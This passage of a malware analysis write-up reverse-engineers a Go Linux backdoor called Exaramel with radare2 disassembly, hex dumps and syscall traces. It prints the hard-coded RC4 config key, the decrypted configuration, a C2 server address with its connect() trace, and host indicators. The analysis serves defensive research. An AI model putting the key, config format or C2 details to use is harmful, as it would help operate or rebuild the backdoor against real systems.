<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1b1</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span> M<span class="sy0">=======</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1b6</span> &nbsp; &nbsp; &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_4b0h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1bb</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_4b8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1c0</span> &nbsp; &nbsp; &nbsp;test rax<span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x005fe1c3</span> &nbsp; &nbsp; &nbsp;jne <span class="nu0">0x5ff1c6</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__Transport_<span class="sy0">.</span>dialConn @ <span class="nu0">0x5ff1fa</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1c9</span> &nbsp; &nbsp; &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">0x0068f0a0</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1d0</span> &nbsp; &nbsp; &nbsp;mov qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1d4</span> &nbsp; &nbsp; &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_300h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1dc</span> &nbsp; &nbsp; &nbsp;mov qword <span class="br0">&#91;</span>var_4b8h<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1e1</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_2f8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.net_http.__Transport_.dialConn:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda2d</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda58</span> int64_t arg1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda5c</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda6e</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454fa4 fcn<span class="sy0">.</span>00454fa4</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda7b</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>key</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda80</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda85</span> int64_t arg1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda97</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdab4</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdb69</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdbad</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdbbf</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdc8f</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http_httptrace<span class="sy0">.</span>ContextClientTrace</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdd41</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>addr <span class="sy0">;</span><span class="st0">&quot;tcp -&gt; &nbsp;&lt;== ==&gt; @@@ MB) <span class="es1">\r</span><span class="es1">\t</span><span class="es1">\n</span> as &nbsp;at &nbsp;fp= in &nbsp;is &nbsp;lr: of &nbsp;on &nbsp;pc= sp: sp=!= 0%x<span class="es1">\r</span><span class="es1">\n</span>&amp;gt;&amp;lt;'<span class="es1">\'</span>&quot;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdd7d</span> <span class="kw3">call</span> rcx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fde21</span> <span class="kw3">call</span> sym<span class="sy0">.</span>crypto_tls<span class="sy0">.</span>__Conn_<span class="sy0">.</span>Handshake</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fde70</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdeeb</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f34 fcn<span class="sy0">.</span>00454f34</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf17</span> <span class="kw3">call</span> rbx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf29</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf47</span> <span class="kw3">call</span> sym<span class="sy0">.</span>crypto_tls<span class="sy0">.</span>__Conn_<span class="sy0">.</span>ConnectionState</div></li>
<li class="li1"><div class="de1"><span class="co1">--- end ---</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
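<li class="li1"><div class="de1"><span class="sy0">//</span> drops its config file <span class="br0">&#40;</span>config.json in the current directory<span class="br0">&#41;</span></div></li>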
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">openat<span class="br0">&#40;</span>AT_FDCWD<span class="sy0">,</span> <span class="st0">&quot;{current dir}config.json&quot;</span><span class="sy0">,</span> <span class="nu0">1</span>|<span class="nu0">2</span>|<span class="nu0">0</span>|<span class="nu0">0</span><span class="sy0">,</span> <span class="nu0">0666</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span> <span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> writes the data below into it, encrypted <span class="br0">&#40;</span><span class="kw3">call</span><span class="sy0">:</span> Go crypto RC4 library<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006f9990</span> &nbsp;<span class="nu0">6874</span> <span class="nu0">7470</span> 733a 2f2f <span class="nu0">3137</span> 362e <span class="nu0">3331</span> <span class="nu0">2e32</span> &nbsp;https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006f99a0</span> &nbsp;<span class="nu0">3235</span> <span class="nu0">2e32</span> <span class="nu0">3034</span> 2f61 <span class="nu0">7069</span> 2f76 <span class="nu0">3100</span> <span class="nu0">0000</span> &nbsp;<span class="nu0">25.204</span><span class="sy0">/</span>api<span class="sy0">/</span>v1<span class="sy0">...</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> encryption key <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="kw2">in</span><span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x006da25a</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">37</span><span class="sy0">%</span> <span class="nu0">16384</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pd $r @ hit2_0</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> DATA XREFS from sym<span class="sy0">.</span>main<span class="sy0">.</span>main @ <span class="nu0">0x647823</span><span class="sy0">,</span> <span class="nu0">0x6486eb</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647787</span> &nbsp; &nbsp; &nbsp;488d8c249800<span class="sy0">.</span> &nbsp;lea rcx<span class="sy0">,</span> <span class="br0">&#91;</span>var_98h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x0064778f</span> &nbsp; &nbsp; &nbsp;48898c24b002<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_2b0h<span class="br0">&#93;</span><span class="sy0">,</span> rcx</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647797</span> &nbsp; &nbsp; &nbsp;<span class="nu0">48890424</span> &nbsp; &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x0064779b</span> &nbsp; &nbsp; &nbsp;488d8c247802<span class="sy0">.</span> &nbsp;lea rcx<span class="sy0">,</span> <span class="br0">&#91;</span>var_278h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477a3</span> &nbsp; &nbsp; &nbsp;48894c2408 &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_8h<span class="br0">&#93;</span><span class="sy0">,</span> rcx</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477a8</span> &nbsp; &nbsp; &nbsp;48c744241004<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_10h<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">4</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477b1</span> &nbsp; &nbsp; &nbsp;48c744241804<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_18h<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">4</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477ba</span> &nbsp; &nbsp; &nbsp;e8e1defcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>Notify</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477bf</span> &nbsp; &nbsp; &nbsp;488b84242001<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_120h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477c7</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889442410</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_10h<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477cc</span> &nbsp; &nbsp; &nbsp;488b84244001<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_140h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477d4</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889442418</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_18h<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477d9</span> &nbsp; &nbsp; &nbsp;488b8c244801<span class="sy0">.</span> &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_148h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477e1</span> &nbsp; &nbsp; &nbsp;48894c2420 &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_20h<span class="br0">&#93;</span><span class="sy0">,</span> rcx </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477e6</span> &nbsp; &nbsp; &nbsp;c70424180000<span class="sy0">.</span> &nbsp;mov dword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">0x18</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477ed</span> &nbsp; &nbsp; &nbsp;488d1534160a<span class="sy0">.</span> &nbsp;lea rdx<span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">0x006e8e28</span><span class="br0">&#93;</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477f4</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889542408</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_8h<span class="br0">&#93;</span><span class="sy0">,</span> rdx </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477f9</span> &nbsp; &nbsp; &nbsp;e8729cdeff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477fe</span> &nbsp; &nbsp; &nbsp;488b05c3e71d<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span><span class="nu0">0x00825fc8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647805</span> &nbsp; &nbsp; &nbsp;4885c0 &nbsp; &nbsp; &nbsp; &nbsp; test rax<span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp;┌─<span class="sy0">&lt;</span> <span class="nu0">0x00647808</span> &nbsp; &nbsp; &nbsp;<span class="nu0">7527</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jne <span class="nu0">0x647831</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x0064780a</span> &nbsp; &nbsp; &nbsp;48c705b3e71d<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span><span class="nu0">0x00825fc8</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">0xa</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x00647815</span> &nbsp; &nbsp; &nbsp;8b0515bf1f00 &nbsp; mov eax<span class="sy0">,</span> dword <span class="br0">&#91;</span>obj<span class="sy0">.</span>runtime<span class="sy0">.</span>writeBarrier<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x0064781b</span> &nbsp; &nbsp; &nbsp;85c0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test eax<span class="sy0">,</span> eax </div></li>
<li class="li1"><div class="de1">│┌──<span class="sy0">&lt;</span> <span class="nu0">0x0064781d</span> &nbsp; &nbsp; &nbsp;0f85bd0e0000 &nbsp; jne <span class="nu0">0x6486e0</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│││ &nbsp; &nbsp;<span class="nu0">0x00647823</span> &nbsp; &nbsp; &nbsp;488d05302a09<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>hit2_0<span class="br0">&#93;</span> <span class="sy0">;</span> <span class="nu0">0x6da25a</span> <span class="sy0">;</span> <span class="st0">&quot;s0m3t3rr0r&quot;</span> <span class="sy0">&lt;======</span>KEY!!</div></li>
<li class="li1"><div class="de1">│││ &nbsp; &nbsp;<span class="nu0">0x0064782a</span> &nbsp; &nbsp; &nbsp;4889058fe71d<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>key<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006da25a</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">37</span><span class="sy0">%</span> <span class="nu0">16384</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> ps </div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006da25a</span> <span class="sy0">&lt;</span>nil<span class="sy0">&gt;</span>runtime<span class="sy0">:</span> s0m3t3rr0r<span class="br0">&#40;</span><span class="sy0">++</span>junk<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> config</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">~<span class="sy0">/</span>test$ r2 config<span class="sy0">.</span>json </div></li>
<li class="li1"><div class="de1">&nbsp;<span class="co1">-- Invert the block bytes using the 'I' key in visual mode</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00000000</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> px</div></li>
<li class="li1"><div class="de1"><span class="sy0">-</span> offset <span class="sy0">-</span> &nbsp; <span class="nu0">0</span> <span class="nu0">1</span> &nbsp;<span class="nu0">2</span> <span class="nu0">3</span> &nbsp;<span class="nu0">4</span> <span class="nu0">5</span> &nbsp;<span class="nu0">6</span> <span class="nu0">7</span> &nbsp;<span class="nu0">8</span> <span class="nu0">9</span> &nbsp;A B &nbsp;C D &nbsp;E F &nbsp;0123456789ABCDEF</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000000</span> &nbsp;4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf &nbsp;Oe<span class="sy0">....+</span><span class="nu0">3</span><span class="sy0">:</span>a7<span class="sy0">.....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000010</span> &nbsp;9f57 b918 6d1e e9b8 <span class="nu0">8116</span> <span class="nu0">057f</span> a636 <span class="nu0">08e2</span> &nbsp;<span class="sy0">.</span>W<span class="sy0">..</span>m<span class="sy0">........</span><span class="nu0">6</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000020</span> &nbsp;4b5a 15c1 57a1 a0e9 <span class="nu0">1297</span> <span class="nu0">49e8</span> <span class="nu0">2942</span> 8f78 &nbsp;KZ<span class="sy0">..</span>W<span class="sy0">.....</span>I<span class="sy0">.</span><span class="br0">&#41;</span>B<span class="sy0">.</span>x</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000030</span> &nbsp;e267 95ad aead <span class="nu0">0846</span> <span class="nu0">5074</span> d17f 9eab e8c6 &nbsp;<span class="sy0">.</span>g<span class="sy0">.....</span>FPt<span class="sy0">......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000040</span> &nbsp;7c29 d378 4fd7 <span class="nu0">5071</span> c311 53f5 de02 32d0 &nbsp;|<span class="br0">&#41;</span><span class="sy0">.</span>xO<span class="sy0">.</span>Pq<span class="sy0">..</span>S<span class="sy0">...</span><span class="nu0">2</span><span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000050</span> &nbsp;<span class="nu0">3e93</span> <span class="nu0">45e8</span> de72 a424 70fb <span class="nu0">00e0</span> f30f 5be0 &nbsp;<span class="sy0">&gt;.</span>E<span class="sy0">..</span>r<span class="sy0">.</span>$p<span class="sy0">.....</span><span class="br0">&#91;</span><span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000060</span> &nbsp;37eb 47a9 d57e ebee <span class="nu0">583f</span> 339c <span class="nu0">5672</span> 23c4 &nbsp;<span class="nu0">7</span><span class="sy0">.</span>G<span class="sy0">..</span>~<span class="sy0">..</span>X?<span class="nu0">3</span><span class="sy0">.</span>Vr<span class="sy0">#.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000070</span> &nbsp;adbf d997 2f99 5a7f 063c 9ba5 <span class="nu0">7028</span> 15b7 &nbsp;<span class="sy0">..../.</span>Z<span class="sy0">..&lt;..</span>p<span class="br0">&#40;</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000080</span> &nbsp;3ce6 da90 98ae 8c34 f8b2 <span class="nu0">0331</span> a445 d517 &nbsp;<span class="sy0">&lt;......</span><span class="nu0">4</span><span class="sy0">...</span><span class="nu0">1</span><span class="sy0">.</span>E<span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000090</span> &nbsp;a946 173b c506 c450 0f9e 6a48 d068 b6c8 &nbsp;<span class="sy0">.</span>F<span class="sy0">.;...</span>P<span class="sy0">..</span>jH<span class="sy0">.</span>h<span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x000000a0</span> &nbsp;ffff ffff ffff ffff ffff ffff ffff ffff &nbsp;<span class="sy0">................</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
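<li class="li1"><div class="de1"><span class="sy0">//</span> the file is RC4-encrypted with the key above <span class="br0">&#40;</span>hard-coded in the binary, loaded into main.key<span class="br0">&#41;</span><span class="sy0">;</span> any RC4 implementation decodes it<span class="sy0">:</span></div></li>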
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span><span class="st0">&quot;Hosts&quot;</span><span class="sy0">:</span><span class="br0">&#91;</span><span class="st0">&quot;https://176.31.225.204/api/v1&quot;</span><span class="br0">&#93;</span><span class="sy0">,</span><span class="st0">&quot;Proxy&quot;</span><span class="sy0">:</span><span class="st0">&quot;&quot;</span><span class="sy0">,</span><span class="st0">&quot;Version&quot;</span><span class="sy0">:</span><span class="st0">&quot;1&quot;</span><span class="sy0">,</span><span class="st0">&quot;Guid&quot;</span><span class="sy0">:</span><span class="st0">&quot;c65f5f15-2e64-4b41-9c95-59f0d94f5fca&quot;</span><span class="sy0">,</span><span class="st0">&quot;Next&quot;</span><span class="sy0">:</span><span class="nu0">20</span><span class="sy0">,</span><span class="st0">&quot;Datetime&quot;</span><span class="sy0">:</span><span class="st0">&quot;&quot;</span><span class="sy0">,</span><span class="st0">&quot;Timeout&quot;</span><span class="sy0">:</span><span class="nu0">30</span><span class="sy0">,</span><span class="st0">&quot;Def&quot;</span><span class="sy0">:</span><span class="nu0">20</span><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> c2 </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x6f9990</span> <span class="nu0">30</span> <span class="nu0">29</span> https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">/</span>api<span class="sy0">/</span>v1</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> the callback is visible at the OS level <span class="br0">&#40;</span>syscall trace<span class="br0">&#41;</span> in<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">connect<span class="br0">&#40;</span><span class="nu0">6</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_INET<span class="sy0">,</span> sin_port<span class="sy0">=</span>htons<span class="br0">&#40;</span><span class="nu0">443</span><span class="br0">&#41;</span><span class="sy0">,</span> sin_addr<span class="sy0">=</span>inet_addr<span class="br0">&#40;</span><span class="st0">&quot;176.31.225.204&quot;</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
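<li class="li1"><div class="de1"><span class="sy0">//</span> file enumeration <span class="br0">&#40;</span>this happened before C2 networking started, per clone<span class="sy0">;</span> $SOCKET below stands for the descriptor passed to getdents64, which has to be an open directory<span class="br0">&#41;</span></div></li>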
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">getdents64<span class="br0">&#40;</span>$SOCKET<span class="sy0">,</span> <span class="br0">&#123;</span><span class="br0">&#123;</span>d_ino<span class="sy0">=</span>$INODENUM<span class="sy0">,</span> d_off<span class="sy0">=</span>$OFFSETNUM<span class="sy0">,..</span></div></li>
<li class="li1"><div class="de1">loop </div></li>
<li class="li1"><div class="de1">&nbsp;<span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;lstat<span class="br0">&#40;</span><span class="st0">&quot;{$CURRPATH}/{files}&quot;</span><span class="sy0">..</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;openat<span class="br0">&#40;</span>AT_FDCWD<span class="sy0">,</span> <span class="st0">&quot;{$CURRPATH}/{$DIRS}&quot;</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">getdents64<span class="br0">&#40;</span>$SOCKET<span class="sy0">,</span> <span class="br0">&#123;</span><span class="br0">&#125;</span><span class="sy0">,</span> $MMAP<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">close<span class="br0">&#40;</span>$SOCKET<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Dynamic Analysis &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
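<li class="li1"><div class="de1"><span class="sy0">//</span> the sample works<span class="sy0">;</span> memory map and open files of the live process <span class="br0">&#40;</span>note the unix socket /tmp/.applock on fd 3, a candidate host-side indicator<span class="br0">&#41;</span><span class="sy0">:</span></div></li>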
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">00400000</span><span class="sy0">-</span><span class="nu0">00649000</span> r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">08</span><span class="sy0">:</span><span class="nu0">01</span> <span class="nu0">397381</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1"><span class="nu0">00649000</span><span class="sy0">-</span>007f6000 r<span class="co1">--p 00249000 08:01 397381 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; /test/Exaramel</span></div></li>
<li class="li1"><div class="de1">007f6000<span class="sy0">-</span><span class="nu0">00826000</span> rw<span class="sy0">-</span>p 003f6000 <span class="nu0">08</span><span class="sy0">:</span><span class="nu0">01</span> <span class="nu0">397381</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
<li class="li1"><div class="de1"><span class="nu0">00826000</span><span class="sy0">-</span><span class="nu0">00849000</span> rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
<li class="li1"><div class="de1">c000000000<span class="sy0">-</span>c000001000 rw<span class="sy0">-</span>p <span class="nu0">00000000</span> <span class="nu0">00</span><span class="sy0">:</span><span class="nu0">00</span> <span class="nu0">0</span></div></li>
